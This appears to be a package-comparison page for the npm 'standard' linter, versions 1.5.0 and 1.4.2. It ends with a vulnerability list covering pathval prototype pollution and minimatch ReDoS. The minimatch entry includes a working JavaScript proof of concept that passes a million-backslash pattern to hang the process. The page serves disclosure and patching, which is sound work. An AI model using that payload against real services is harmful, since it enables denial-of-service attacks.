Standard version 1.5.0 introduces notable changes compared to its predecessor, version 1.4.2, primarily centered around its development dependencies. While both versions share the same core dependencies essential for enforcing the JavaScript Standard Style, such as glob, jscs, split, jshint, find-root, and minimatch, version 1.5.0 incorporates additional tools specifically for development and testing. The most significant difference lies in the addition of mkdirp, rimraf, and run-series as development dependencies.
These additions indicate an enhanced development workflow, likely focusing on improved build processes, easier directory creation (mkdirp), cross-platform file deletion (rimraf) and streamlined sequential task execution (run-series). For developers utilizing standard, this translates to potentially faster and more reliable testing and build procedures within the standard package itself. The core functionality of enforcing JavaScript Standard Style remains consistent, but the updated development dependencies point toward a more robust and maintainable codebase, indirectly benefiting end-users through a more stable and refined tool. Importantly, the core linting behavior should remain the same between the two versions, as the core dependencies remain untouched as well as the primary functionality.
All the vulnerabilities related to the version 1.5.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.